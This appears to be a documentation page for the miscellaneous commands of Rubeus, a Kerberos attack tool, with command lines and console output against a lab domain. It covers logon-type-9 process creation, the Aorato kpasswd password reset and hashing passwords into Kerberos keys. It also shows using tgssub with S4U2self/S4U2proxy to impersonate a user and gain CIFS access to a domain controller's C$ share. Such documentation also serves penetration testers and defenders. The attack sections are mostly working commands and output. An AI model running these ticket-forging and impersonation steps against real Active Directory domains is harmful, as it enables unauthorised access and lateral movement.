Miscellaneous

Breakdown of the miscellaneous commands:

Command

Description

createnetonly

Create a process of logon type 9

changepw

Perform the Aorato Kerberos password reset

hash

Hash a plaintext password to Kerberos encryption keys

tgssub

Substitute in alternate service names into a service ticket

currentluid

Display the current user's LUID

createnetonly

The createnetonly action will use the CreateProcessWithLogonW() API to create a new hidden (unless /show is specified) process with a SECURITY_LOGON_TYPE of 9 (NewCredentials), the equivalent of runas /netonly. The process ID and LUID (logon session ID) are returned. This process can then be used to apply specific Kerberos tickets to with the ptt /luid:0xA.. parameter, assuming elevation. This prevents the erasure of existing TGTs for the current logon session.

Create a hidden upnpcont.exe process:

C:\Rubeus>Rubeus.exe createnetonly /program:"C:\Windows\System32\upnpcont.exe"

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Create Process (/netonly)

[*] Showing process : False
[+] Process         : 'C:\Windows\System32\upnpcont.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 9936
[+] LUID            : 0x4a0717f

Create a visible command prompt:

C:\Rubeus>Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Create Process (/netonly)

[*] Showing process : True
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5352
[+] LUID            : 0x4a091c0

changepw

The changepw action will take a user's TGT .kirbi blog and execute a MS kpasswd password change with the specified /new:PASSWORD value. If a /dc is not specified, the computer's current domain controller is extracted and used as the destination for the password reset traffic. This is the Aorato Kerberos password reset disclosed in 2014, and is equivalent to Kekeo's misc::changepw function.

You can retrieve a TGT blob using the asktgt command.

C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3

[*] Action: Reset User Password (AoratoPw)

[*] Changing password for user: harmj0y@TESTLAB.LOCAL
[*] New password value: Password123!
[*] Building AP-REQ for the MS Kpassword request
[*] Building Authenticator with encryption key type: rc4_hmac
[*] base64(session subkey): nX2FOQ3RsGxoI8uqIg1zlg==
[*] Building the KRV-PRIV structure
[*] Connecting to 192.168.52.100:464
[*] Sent 1347 bytes
[*] Received 167 bytes
[+] Password change success!

hash

The hash action will take a /password:X and optional /user:USER and/or /domain:DOMAIN. It will generate the rc4_hmac (NTLM) representation of the password using @gentilkiwi's kerberos:hash (KERB_ECRYPT HashPassword) approach. If user and domain names are specified, the aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hash forms are generated. The user and domain names are used as salts for the AES and DES implementations.

Calculating the rc4_hmac of a password:

C:\Rubeus>Rubeus.exe hash /password:Password123!

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.0


[*] Action: Calculate Password Hashes

[*] Input password             : Password123!
[*]       rc4_hmac             : 2B576ACBE6BCFDA7294D6BD18041B8FE

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

Calculating all hash formats:

C:\Rubeus>Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.0


[*] Action: Calculate Password Hashes

[*] Input password             : Password123!
[*] Input username             : harmj0y
[*] Input domain               : testlab.local
[*] Salt                       : TESTLAB.LOCALharmj0y
[*]       rc4_hmac             : 2B576ACBE6BCFDA7294D6BD18041B8FE
[*]       aes128_cts_hmac_sha1 : B0A79AB550536860123B427C14F2A531
[*]       aes256_cts_hmac_sha1 : F7FEBF9779401B653911A56A79FF9E3A58F7F8990FDB3D9CA0E89227ABF13287
[*]       des_cbc_md5          : 614589E66D6B3792

tgssub

The tgssub action will take a service ticket base64 blob/file specification and substitute an alternate service name into the ticket. This is useful for S4U abuse and other scenarios.

The /altservice:X flag is required and can either be a standalone sname (ldap, cifs, etc.) or a full service principal name (cifs/computer.domain.com). The latter is useful in some S4U2self abuse scenarios with resource-based constrained delegation. See Elad Shamir's post on the topic for more information.

The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session.

Executing the S4U2self/S4U2proxy proces to abuse traditional constrained delegation, and replacing the sname in the final ticket. This is so you don't have to execute the S4U process for a second time:

C:\Rubeus>Rubeus.exe s4u /user:patsy /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /msdsspn:ldap/PRIMARY.testlab.local /impersonateuser:harmj0y /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\patsy'
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...


[*] Action: S4U

[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2self request for: 'patsy@TESTLAB.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'patsy@TESTLAB.LOCAL'
[*] base64(ticket.kirbi):

    doIFXjCCBVqgAwIBBaEDAgEWoo...(snip)...

[*] Impersonating user 'harmj0y' to target SPN 'ldap/PRIMARY.testlab.local'
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':

    doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...

[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Access is denied.

C:\Rubeus>Rubeus.exe tgssub /ticket:doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)... /altservice:cifs /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Service Ticket sname Substitution

[*] Substituting in alternate service name: cifs
[*] base64(ticket.kirbi):

    doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...

[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  cifs/PRIMARY.testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:51:06 PM
EndTime               :  3/1/2019 5:51:06 PM
RenewTill             :  3/8/2019 12:51:06 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType               :  aes128_cts_hmac_sha1
Base64(key)           :  yxQVMhl0qn3P0wUUC4KnGQ==


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Volume in drive \\primary.testlab.local\C$ has no label.
Volume Serial Number is A48B-4D68

Directory of \\primary.testlab.local\C$

07/05/2018  12:57 PM    <DIR>          dumps
03/05/2017  04:36 PM    <DIR>          inetpub
07/21/2018  07:41 PM                 9 out.txt
08/22/2013  07:52 AM    <DIR>          PerfLogs
04/15/2017  05:25 PM    <DIR>          profiles
08/28/2018  11:51 AM    <DIR>          Program Files
08/28/2018  11:51 AM    <DIR>          Program Files (x86)
10/09/2018  12:04 PM    <DIR>          Temp
08/23/2018  03:52 PM    <DIR>          Users
10/25/2018  01:15 PM    <DIR>          Windows
            1 File(s)              9 bytes
            9 Dir(s)  40,463,851,520 bytes free

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2



[*] Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x6de14

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM
    Server Name       : cifs/PRIMARY.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

    [1] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM
    Server Name       : ldap/PRIMARY.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

Executing S4U2self to a machine using its machine account hash, substituting in the service names we want to abuse after:

C:\Rubeus>Rubeus.exe s4u /user:primary$ /rc4:46b910dbe4514bd144b44cb554c256db /impersonateuser:harmj0y

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 46b910dbe4514bd144b44cb554c256db
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\primary$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIFIDCCBRygAwIBBaEDAgEWoo...(snip)...


[*] Action: S4U

[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2self request for: 'primary$@TESTLAB.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'primary$@TESTLAB.LOCAL'
[*] base64(ticket.kirbi):

    doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...


C:\Rubeus>Rubeus.exe describe /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  primary$
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:43:56 PM
EndTime               :  3/1/2019 5:43:56 PM
RenewTill             :  3/8/2019 12:43:56 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable
KeyType               :  aes256_cts_hmac_sha1
Base64(key)           :  X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=

[!] Service ticket uses encryption key type 'aes256_cts_hmac_sha1', unable to extract hash and salt.


C:\Rubeus>dir \\primary.testlab.local\C$
Access is denied.

C:\Rubeus>Rubeus.exe purge

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

Luid: 0x0

[*] Action: Purge Tickets
[+] Tickets successfully purged!

C:\Rubeus>Rubeus.exe tgssub /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)... /altservice:cifs/primary.testlab.local /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Service Ticket sname Substitution

[*] Substituting in alternate service name: cifs/primary.testlab.local
[*] base64(ticket.kirbi):

    doIFpjCCBaKgAwIBBaEDAgEWoo...(snip)...

[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  cifs/primary.testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:43:56 PM
EndTime               :  3/1/2019 5:43:56 PM
RenewTill             :  3/8/2019 12:43:56 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable
KeyType               :  aes256_cts_hmac_sha1
Base64(key)           :  X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Volume in drive \\primary.testlab.local\C$ has no label.
Volume Serial Number is A48B-4D68

Directory of \\primary.testlab.local\C$

07/05/2018  12:57 PM    <DIR>          dumps
03/05/2017  04:36 PM    <DIR>          inetpub
08/22/2013  07:52 AM    <DIR>          PerfLogs
04/15/2017  05:25 PM    <DIR>          profiles
08/28/2018  11:51 AM    <DIR>          Program Files
08/28/2018  11:51 AM    <DIR>          Program Files (x86)
10/09/2018  12:04 PM    <DIR>          Temp
08/23/2018  03:52 PM    <DIR>          Users
10/25/2018  01:15 PM    <DIR>          Windows
            1 File(s)              9 bytes
            9 Dir(s)  40,462,831,616 bytes free

currentluid

The currentluid action will display the current user's logon ID (LUID).

C:\Rubeus>Rubeus.exe currentluid

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.5.0


[*] Action: Display current LUID

[*] Current LogonID (LUID) : 0x121078 (1183864)

Last updated